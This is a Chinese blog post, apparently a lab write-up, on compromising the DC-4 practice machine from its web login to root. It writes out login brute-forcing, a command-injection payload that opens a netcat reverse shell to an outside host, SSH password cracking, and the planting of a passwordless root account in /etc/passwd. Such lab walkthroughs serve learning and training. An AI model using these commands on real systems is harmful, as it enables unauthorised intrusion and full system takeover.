资讯动态

DC-4靶机渗透复盘:我是如何从Web登录框一路‘捡漏’到Root权限的

发布时间:2026/8/22 20:51:58 来源:尧图企业网站定制
DC-4靶机渗透复盘我是如何从Web登录框一路‘捡漏’到Root权限的那天下午我决定挑战DC-4靶机。作为一个渗透测试爱好者我更喜欢把每次测试当作一次侦探游戏——不是简单地执行工具而是像拼图一样把每个线索串联起来。这次经历让我深刻体会到真正的渗透往往发生在工具输出与人工分析的交叉点上。1. 信息收集从IP发现到服务探测任何渗透测试都始于基础信息收集。我习惯先用arp-scan快速定位内网存活主机arp-scan -l --interfaceeth0输出显示192.168.1.15这个陌生IP对比已知设备列表后确认这就是DC-4靶机。接着用Nmap进行深度扫描nmap -sS -A -T4 192.168.1.15关键发现22/tcpOpenSSH 7.4p180/tcpnginx/1.15.10操作系统猜测Linux 3.10-4.0有趣的是Nmap的-A参数自动执行的脚本检测到web根目录存在/login.php这直接锁定了初步攻击面。2. Web渗透从登录框到命令执行访问80端口看到一个简洁的登录页面。根据经验这类靶机常用弱密码我决定先尝试默认凭证用户名密码结果adminadmin失败adminpassword失败admin123456失败当基础字典无效时我注意到Kali自带的John the Ripper字典可能更适配cp /usr/share/john/password.lst ~/dc4_wordlist.txt使用Burp Suite的Intruder模块进行爆破抓取登录请求发送到Intruder设置password参数为攻击点载荷选择刚复制的字典文件按响应长度排序结果关键发现当密码happy时响应长度异常成功登录后看到一个名为Command的功能页。点击Run按钮执行了whoami命令这立即触发了我的命令注入雷达。通过Burp拦截请求修改参数实现反向shellradiorm/tmp/f%3bmkfifo/tmp/f%3bcat/tmp/f|/bin/sh-i2%261|nc192.168.1.94444/tmp/fsubmitRun同时在Kali启动监听nc -lvnp 44443. 横向移动意外发现的密码宝藏获取初始shell后我立即升级为交互式终端python -c import pty; pty.spawn(/bin/bash)在探索/home目录时发现三个用户charlesjimsam转折点出现在检查jim的目录时cd /home/jim ls -la backups/old-passwords.bak这个文件名称太诱人了——打开后发现竟是包含历史密码的文本我立即将其下载到本地作为新字典hydra -l jim -P old-passwords.txt ssh://192.168.1.15 -t 4十分钟后成功爆破出密码jibril04。通过SSH登录jim账户后发现邮件提示From: charles Subject: Password Content: Heres your new password: ^xHhAhvim0y这简直是渗透测试者的圣诞礼物立即切换用户su charles ^xHhAhvim0y4. 权限提升sudo配置的致命疏忽查看sudo权限时发现黄金机会sudo -l输出显示charles可以以root身份执行/usr/bin/teehee——一个通常用于文件写入的工具。查阅手册后发现它支持-a追加模式于是构造特权用户sudo teehee -a /etc/passwd EOF backdoor::0:0:::/bin/bash EOF验证提权su backdoor whoami # 返回root最后在/root目录找到flag文件完成了这次充满运气的渗透之旅。实际上每个看似偶然的发现背后都离不开对系统配置习惯的认知如备份文件存放位置、对权限机制的深刻理解以及最重要的——不放过任何蛛丝马迹的探索精神。

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价